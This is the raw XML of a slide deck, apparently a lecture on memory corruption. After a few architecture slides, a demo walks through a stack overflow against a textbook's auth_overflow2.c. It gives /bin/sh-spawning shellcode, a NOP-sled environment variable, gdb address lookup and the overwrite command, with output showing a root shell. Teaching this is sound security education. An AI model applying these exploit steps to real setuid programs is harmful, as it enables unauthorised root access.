              <a:rPr lang="en"/>
              <a:t>made sense back in the tape/card days...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Now AVR micro controllers..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="3" marL="1828800" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Arduino</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>physically separates data and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>entirely different address</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>spaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>separate signal pathway</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="1" marL="914400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>most modern processors implement small parts of </a:t>
            </a:r>
            <a:br>
              <a:rPr i="1" lang="en"/>
            </a:br>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>a modified harvard architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1371600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>to support loading a program from disk storage as data, and then executing it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Shape 134"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582235" y="1780888"/>
            <a:ext cx="4104564" cy="2612638"/>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7" name="Shape 737"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="738" name="Shape 738"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Demo#1 Walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Shape 739"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Use these commands to do what I did at home.</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3" name="Shape 743"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="744" name="Shape 744"/>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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>An example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="745" name="Shape 745"/>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lang="en"/>
              <a:t>We're going to exploit the stack frame to change the return address to jump to shellcode that we've hidden in the environment variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lets use auth_overflow2.c from HAOE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>With the live cd, compile auth_overflow2.c with the following commands:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ gcc -g auth_overflow2.c -o auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ sudo chown root:root ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>reader@hacking:~/booksrc $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng"/>
              <a:t>sudo chmod u+s ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>										^ (set suid bit)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*	I simply set things as root, and suid to easily verify if the exploit works, otherwise might have to break out strace to prove the exploit worked, and that you spawned a NEW shell, instead of returning to the old one :)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x/24s $esp + 0x1FF</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9" name="Shape 749"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="750" name="Shape 750"/>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Our shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="751" name="Shape 751"/>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lang="en"/>
              <a:t>setup file "shellcode.hex" to contain:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>\xe1\xcd\x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </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5" name="Shape 755"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="756" name="Shape 756"/>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Shellcode conversion</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Shape 757"/>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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We need it in binary form.  So run the following in bash:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ for i in $(cat shellcode.hex); do echo -en $i; done &gt; shellcode.bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Then shellcode.bin will be in binary. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$cat shellcode.bin </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>this will give us a bunch of garbage (thats ok)</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1" name="Shape 761"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="762" name="Shape 762"/>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Environment Variables :)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="763" name="Shape 763"/>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lang="en"/>
              <a:t>put the shellcode into environment variables, with a healthy nop-sled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>check the result via:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ echo $SHELLCODE</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sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Shape 768"/>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Finding the env vars on the stack with gdb</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Shape 769"/>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b="1" lang="en"/>
              <a:t>$ gdb ./auth_overflow2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) break main</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>//finds the environment variables on the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>(gdb) x/24s $esp + 0x1FF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffff8ff:      "SHELLCODE=", '\220' &lt;repeats 190 times&gt;...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbffff9c7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>"\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffff9f5:      "TERM=xterm"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa00:      "SHELL=/bin/bash"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa10:      "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa4b:      "WINDOWID=20971602"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>0xbffffa5d:      "USER=reader"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="770" name="Shape 770"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6627288" y="1817691"/>
            <a:ext cx="2463600" cy="1237800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xbffff9c7 is going to be our target return address... right in the middle of that sweet NOP sled</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Shape 775"/>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SMASH THE STACK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Shape 776"/>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lang="en"/>
              <a:t>$ ./auth_overflow2 $(perl -e 'print "\xc7\xf9\xff\xbf"x40')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2# whoami</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>sh-3.2#</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a:t>or use python:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ ./auth_overflow2 $(python -c "print '\xc7\xf9\xff\xbf'*40")</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="777" name="Shape 777"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765125" y="2090400"/>
            <a:ext cx="3515400" cy="1816800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>^ Remember, x86 architecture is little endian </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1" name="Shape 781"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Shape 782"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2266576"/>
            <a:ext cx="6400800" cy="1333800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Demo #2 walkthrough</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Shape 783"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="3600451"/>
            <a:ext cx="6400800" cy="900600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ret to lib c</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7" name="Shape 787"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="788" name="Shape 788"/>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vuln.c</a:t>
            </a:r>
          </a:p>
